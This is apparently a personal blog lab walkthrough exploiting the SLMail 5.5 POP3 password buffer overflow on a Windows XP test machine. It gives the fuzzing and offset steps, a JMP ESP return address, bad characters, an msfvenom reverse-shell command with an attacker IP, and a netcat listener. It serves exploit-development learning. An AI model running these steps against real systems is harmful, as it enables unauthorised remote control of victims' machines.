BUFFER OVERFLOW — Exploiting SLMail email server

The POP3 server of Seattle Lab Mail 5.5 suffers from an unauthenticated buffer overflow vulnerability when receiving a very long password. We can exploit this vulnerability in any version of Windows running the executable SLmail.exe.

STEPS TO CONDUCT A BUFFER OVERFLOW

1. Spiking: A method that we use to find a vulnerable part of a program.
2. Fuzing: We send a bunch of characters and see if we can break it.
3. Finding the offset: If we break it we want to find out at what point we did break it. So we want to find the offset.
4. Overwriting the EIP: We use the offset to overwrite the EIP, the pointer address we are talking about. If we have EIP control then we can follow the next step.
5. Finding Bad Characters:
6. Finding the Right Module.
7. Generating ShellCode: Creating the malicious shellcode that gives us a reverse shell.
8. Root!

TOOLS TO BE USED

1. victim box: Windows XP
2. Vulnerable software: SLmail
3. Attacker machine: kali
4. Debugger: Immunity Debugger

We start the service with administrative privileges.

Figure: 1

After running service we click on the start button.

Figure: 2

We open the Immunity debugger and attach the SLmail service running on port 110.

Figure: 3

Figure: 4

Reference: https://www.immunityinc.com/products/debugger/

SPIKING

SLmail by default running on port 110. So we try to connect the service with netcat.

We try to check where we can overwrite the stack of the victim with ‘A’ characters. We have to find a vulnerable part. So it looks like we can send the character in the password.

Figure: 5

FUZZING

We send a bunch of 2700 A’s characters.

Figure: 6

Our SLmail has been crashed. We hit a violation in the Immunity debugger.

1. We sent a bunch of AAA’s, so this is going into buffer space and actually filled over.
2. If we look at an EBP (base of register) 41414141 that is the HEX code for four A’s.
3. If we can control EIP, we can get a malicious point. EIP is the most vital in this.

Figure: 7

Fuzzing crashed on 2700 bytes.

Finding the offset

Command
# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700

We are going to get an EIP value. The program will crash and then the value in the EIP is going to come back.

Figure: 8

Figure: 9

We have completely overwritten everything. We crossed the ESP and we got our EIP.

Figure: 10

EIP: 39694438

We will find a pattern offset if we did everything right. Somewhere inside the 2700 bites.

Command
# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2700 -q 39694438

Figure: 11

We have an exact offset match of 2606 bytes. This information is critical now that tells us at 2606 bytes we can control the EIP.

Overwriting the EIP

The offset was at 2606 bytes. This byte right before getting to the EIP. Now we will overwrite those 4 bytes.

We are replacing what we sent before to find the offset with the shellcode. The shellcode is nothing it’ is A’s and B’s now but it is going to give malicious.

In the below code, we are sending 2606 A’s because that’s where is EIP start. So bite 2607 starts the EIP. we are sending a bunch of A’s but we want to make sure that we don’t overwrite the EIP with A’s.
REMEMBER: A’s-41 & B’s-42

If we change the B to C or D it will give 434343 or 44444. But we are taking B so it will give 42424242.

Figure: 12

EBP: 41414141

EIP: 42424242

We sent four bytes of B’s. This means we can control the EIP now.

Figure: 13

Finding Bad Characters

We need to know the bad or good character before creating a shellcode. We check the hex dump.

Figure: 14

Right-click on ESP and follow dump.

Figure: 15

We will check until we find FF. If we have missed anything we have to remove a bad character from the code.

For example - If we see 10,11 and it goes to the 13 so,12 is missing. Here 12 is a bad character.

In our case x0a is a bad character because after 09 it shows 29. So, we have to remove x0a from our code and run the code again.

Figure: 16

Again, SLMail service is restarted and the process attached to Immunity Debugger. We run our code and find another bad character i.e. x0d. In the hex dump after 0C, it shows 0E instead of 0D. So, here x0d is a bad character.

Figure: 17

Only two bad characters we found \x0a & \x0d.

Finding the Right Module

We have to look at any .dll or something similar that has no memory protection. Means no ASLR, no Safe SEH.

We have to download the mona module. file: we copy mona.py and paste into C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands folder.

Reference: https://github.com/corelan/mona

we have to type the mona module in the immunity tool. If we look at the protection setting. we can see it’s false false false false True. Our main file is SLMFC.dll. We will check the process of finding.

Command
# !mona modules

Figure: 18

NASM shell: We are trying to convert assembly language into hex code. We will use JMP ESP, this is a jump command. We will use this as a pointer. The pointer is going to jump to our malicious shellcode.

Figure: 19

So the hex code equivalent of JMP ESP is FFE4.

Command
# !mona find -s “\xff\xe4” -m SLMFC.DLL

We look at the address 5f4a358f
Address=5F4A358F
Message= 0x5f4a358f : “\xff\xe4” | {PAGE_READONLY} [SLMFC.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v6.00.8063.0 (C:\WINDOWS\system32\SLMFC.DLL)

Figure: 20

we have written the return address into reverse. Like 0x5F4A358F into \x8f\x35\x4a\x5f

Figure: 21

After entering the jump code we will find ffe4 and then enter the Fn + F2 key.

It turns into blue which means we have set a breakpoint. This means we are going to overflow the buffer but if we hit this specific spot this jump code. This actually breaks the program and pause right here for further instruction from us.

we are overwriting the EIP in the exact spot we need to and then we are able to jump forward.

We make sure immunity is running and then run our python code to see the output.

Figure: 22

Generating ShellCode

Command
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.163.128 LPORT=1234 EXITFUNC=thread -f c -a x86 -b “\x00\x0A\x0D”

payload: -p windows/shell_reverse_tcp
b) local host, attacker’s IP = LHOST = 192.168.163.128
c) local port, LPORT = 1234, where the attacker listens for a shell reverse connection
d) format = -f c, language C
e) EXITFUNC = thread, the execution of the shellcode does not shutdown smail.exe
f) bad characters = \x00\x0A\x0D

Figure: 23

we run our immunity tool in windows and then hit our python code.

Command
# python exploit.py 192.168.163.141

Figure: 24

Command
# rlwrap nc -lnvp 1234

We got our reverse shell.

Figure: 25

Reference: https://www.exploit-db.com/exploits/638

Thank you for reading my blog.